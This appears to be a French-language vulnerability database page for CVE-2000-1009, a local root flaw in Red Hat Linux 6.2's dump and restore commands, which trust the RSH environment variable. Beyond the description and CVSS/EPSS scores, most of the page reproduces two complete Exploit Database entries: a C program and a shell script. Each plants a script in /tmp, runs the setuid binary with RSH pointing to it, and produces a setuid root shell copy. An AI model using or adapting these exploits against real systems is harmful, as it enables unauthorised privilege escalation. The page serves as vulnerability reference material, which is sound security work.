CVE-2000-1009 : Détail

CVE-2000-1009

0.04%V3
Local
2000-11-29
04h00 +00:00
2017-12-18
20h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

dump in Red Hat Linux 6.2 trusts the pathname specified by the RSH environmental variable, which allows local users to obtain root privileges by modifying the RSH variable to point to a Trojan horse program.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 206

Date de publication : 2000-11-28 23h00 +00:00
Auteur : mat
EDB Vérifié : Yes

/* ** ** dump-0.4b15x.c ** ** dump-0.4b15 exploit: ** Redhat 6.2 dump command executes ** external program with suid priviledge. ** ** affected: ** /sbin/dump ** /sbin/dump.static ** /sbin/restore ** /sbin/restore.static ** ** Bug found by mat@hacksware.com ** ** This example was coded by md0claes@mdstud.chalmers.se ** It was written for EDUCATIONAL PURPOSES ONLY. ** ** */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #define RUNME "/tmp/runme" /* tmp file */ #define SUID_PATH "/tmp/superdude" /* the power of root */ void usage(char *pname) { fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname); fprintf(stdout, " d - exploit /sbin/dump\n"); fprintf(stdout, " s - exploit /sbin/dump.static\n"); fprintf(stdout, " r - exploit /sbin/restore\n"); fprintf(stdout, " p - exploit /sbin/restore.static\n\n"); } int main(int argc, char *argv[], char *envp[]) { int fd; pid_t pid; char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME }; char runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash " SUID_PATH "\nchmod 6755 " SUID_PATH }; char *suid[] = { SUID_PATH, NULL }; char *av[] = { "/sbin/restore.static", "restore.static", "-t", "/tmp/foo" }; if (argc != 2) { usage(argv[0]); exit(1); } switch(tolower(argv[1][0])) { case 'd': av[0] = "/sbin/dump"; av[1] = "dump"; av[2] = "-0"; av[3] = "/"; break; case 's': av[0] = "/sbin/dump.static"; av[1] = "dump.static"; av[2] = "-0"; av[3] = "/"; break; case 'r': av[0] = "/sbin/restore"; av[1] = "restore"; break; case 'p': break; default: usage(argv[0]); exit(1); } if ((fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755)) == -1) { perror("fopen"); exit(1); } if (write(fd, runbuf, sizeof(runbuf)) == -1) { perror("write"); exit(1); } close(fd); if ((pid = fork()) < 0) { perror("fork"); exit(1); } else if (pid == 0) { if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) { perror("execle"); _exit(1); } } sleep(1); unlink(RUNME); fprintf(stdout, "\nExploited %s \n", av[0]); fprintf(stdout, "Running " SUID_PATH "\n"); execve(SUID_PATH, suid, envp); exit(0); } // milw0rm.com [2000-11-29]
Exploit Database EDB-ID : 193

Date de publication : 2000-11-18 23h00 +00:00
Auteur : mat
EDB Vérifié : Yes

#!/bin/sh # Redhat 6.2 dump command executes external program # with suid priviledge. # Discovered by Mat <mat@hacksware.com> # Written for and by a scriptkid Tasc ;P # Remember, there's no cure for BSE echo "dump-0.4b15 root exploit" echo "Discovered by Mat <mat@hacksware.com>" echo "-------------------------------------" echo DUMP=/sbin/dump if [ ! -u $DUMP ]; then echo "$DUMP is NOT setuid on this system or does not exist at all!" echo exit 0 fi export TAPE=iamlame:iamlame export RSH=/tmp/rsh cat >/tmp/rsh <<__eof__ #!/bin/sh cp /bin/sh /tmp/sush chmod 4755 /tmp/sush } __eof__ chmod 755 /tmp/rsh /sbin/dump -0 / echo echo "Waiting for rootshell .... 5 seconds...." sleep 5 /tmp/sush id # milw0rm.com [2000-11-19]

Products Mentioned

Configuraton 0

Redhat>>Linux >> Version 6.2

Trustix>>Secure_linux >> Version 1.1

Références

http://www.securityfocus.com/bid/1871
Tags : vdb-entry, x_refsource_BID